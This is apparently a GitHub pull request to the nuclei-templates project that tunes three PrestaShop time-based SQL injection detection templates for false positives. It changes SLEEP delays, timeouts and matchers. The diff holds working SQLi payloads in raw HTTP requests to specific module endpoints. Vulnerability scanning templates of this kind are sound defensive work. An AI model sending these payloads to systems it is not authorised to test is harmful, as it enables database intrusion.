### PR TITLE
fix: avoid false positives in prestashop SQLi

### DIFF
--- a/http/cves/2023/CVE-2023-27847.yaml
+++ b/http/cves/2023/CVE-2023-27847.yaml
@@ -50,7 +50,7 @@ http:
         Host: {{Hostname}}
 
       - |
-        @timeout: 20s
+        @timeout: 30s
         GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(10)))AuDU)--+lafl HTTP/1.1
         Host: {{Hostname}}
 

--- a/http/cves/2023/CVE-2023-27847.yaml
+++ b/http/cves/2023/CVE-2023-27847.yaml
@@ -51,7 +51,7 @@ http:
 
       - |
         @timeout: 20s
-        GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(6)))AuDU)--+lafl HTTP/1.1
+        GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(10)))AuDU)--+lafl HTTP/1.1
         Host: {{Hostname}}
 
     stop-at-first-match: true
@@ -66,5 +66,5 @@ http:
       - type: dsl
         name: time-based
         dsl:
-          - 'duration_2>=6'
+          - 'duration_2>=10'
 # digest: 4a0a00473045022100ee8271677f415ca4c4b08feef9da01311967e2b3edba130957466c852f81abdc02205b5163cdbae603a0d7d2ee225ddf03cb7c0dc41baaa66702977a26a34d94c5ae:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2023/CVE-2023-39650.yaml
+++ b/http/cves/2023/CVE-2023-39650.yaml
@@ -41,7 +41,7 @@ http:
 
   - raw:
       - |
-        @timeout: 20s
+        @timeout: 30s
         GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(10)))oqFL)--+yxoW HTTP/1.1
         Host: {{Hostname}}
         Origin: {{BaseURL}}

--- a/http/cves/2023/CVE-2023-39650.yaml
+++ b/http/cves/2023/CVE-2023-39650.yaml
@@ -42,7 +42,7 @@ http:
   - raw:
       - |
         @timeout: 20s
-        GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(8)))oqFL)--+yxoW HTTP/1.1
+        GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(10)))oqFL)--+yxoW HTTP/1.1
         Host: {{Hostname}}
         Origin: {{BaseURL}}
 
@@ -63,7 +63,7 @@ http:
       - type: dsl
         name: time-based
         dsl:
-          - 'duration_1>=8'
+          - 'duration_1>=10'
           - 'status_code_1 == 200 && contains(body_1, "tvcmsblog")'
         condition: and
 

--- a/http/cves/2024/CVE-2024-36683.yaml
+++ b/http/cves/2024/CVE-2024-36683.yaml
@@ -63,10 +63,19 @@ http:
 
     stop-at-first-match: true
     host-redirects: true
+    matchers-condition: or
     matchers:
       - type: dsl
         dsl:
           - 'duration>=8'
           - 'contains(body, "Error while creating the alert")'
         condition: and
+
+      - type: dsl
+        dsl:
+          - 'duration>=8'
+          - 'len(body) == 0'
+          - 'status_code == 500'
+        condition: and
+
 # digest: 4a0a00473045022064eccc1931d613fe459b34ee9c67bee427e010efd69fb6ef57f710371d3570b70221008441fd87c6a052c66dc10eb38a0669fd1fd24511d4f36d9cf8c07a25744baf07:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2024/CVE-2024-36683.yaml
+++ b/http/cves/2024/CVE-2024-36683.yaml
@@ -72,10 +72,10 @@ http:
         condition: and
 
       - type: dsl
+        name: time-based
         dsl:
-          - 'duration>=8'
-          - 'len(body) == 0'
-          - 'status_code == 500'
-        condition: and
+          - 'duration_1>=8'
+          - 'duration_2>=8'
+        condition: or
 
 # digest: 4a0a00473045022064eccc1931d613fe459b34ee9c67bee427e010efd69fb6ef57f710371d3570b70221008441fd87c6a052c66dc10eb38a0669fd1fd24511d4f36d9cf8c07a25744baf07:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2024/CVE-2024-36683.yaml
+++ b/http/cves/2024/CVE-2024-36683.yaml
@@ -51,7 +51,7 @@ http:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pasubmit=Crea%20un%20nuovo%20messaggio%20di%20notifica&pid=13158
+        cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(8)))IuFA) AND 'pAlk'='pAlk&pasubmit=Crea%20un%20nuovo%20messaggio%20di%20notifica&pid=13158
 
       - |
         @timeout: 30s
@@ -59,14 +59,19 @@ http:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pid=13158
+        cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(8)))IuFA) AND 'pAlk'='pAlk&pid=13158
 
     stop-at-first-match: true
     host-redirects: true
+    matchers-condition: and
     matchers:
       - type: dsl
-        name: time-based
         dsl:
-          - 'duration_1>=5'
-          - 'duration_2>=5'
+          - 'duration_1>=8'
+          - 'duration_2>=8'
+        condition: or
+
+      - type: dsl
+        dsl:
+          - 'contains(body, "Error while creating the alert")'
 # digest: 4a0a00473045022064eccc1931d613fe459b34ee9c67bee427e010efd69fb6ef57f710371d3570b70221008441fd87c6a052c66dc10eb38a0669fd1fd24511d4f36d9cf8c07a25744baf07:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2024/CVE-2024-36683.yaml
+++ b/http/cves/2024/CVE-2024-36683.yaml
@@ -63,15 +63,10 @@ http:
 
     stop-at-first-match: true
     host-redirects: true
-    matchers-condition: and
     matchers:
       - type: dsl
         dsl:
-          - 'duration_1>=8'
-          - 'duration_2>=8'
-        condition: or
-
-      - type: dsl
-        dsl:
+          - 'duration>=8'
           - 'contains(body, "Error while creating the alert")'
+        condition: and
 # digest: 4a0a00473045022064eccc1931d613fe459b34ee9c67bee427e010efd69fb6ef57f710371d3570b70221008441fd87c6a052c66dc10eb38a0669fd1fd24511d4f36d9cf8c07a25744baf07:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

PR https://github.com/projectdiscovery/nuclei-templates/pull/10739 introduced three new templates for Prestashop based on SQL injection with time-based matchers.

This PR is an attempt to avoid false positives with these new templates.
I've included changes to increase the timeout and add body response (when I was able to reproduce the vulnerability).

- Fixed CVE-2023-27847
- Fixed CVE-2023-39650
- Fixed CVE-2024-36683

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)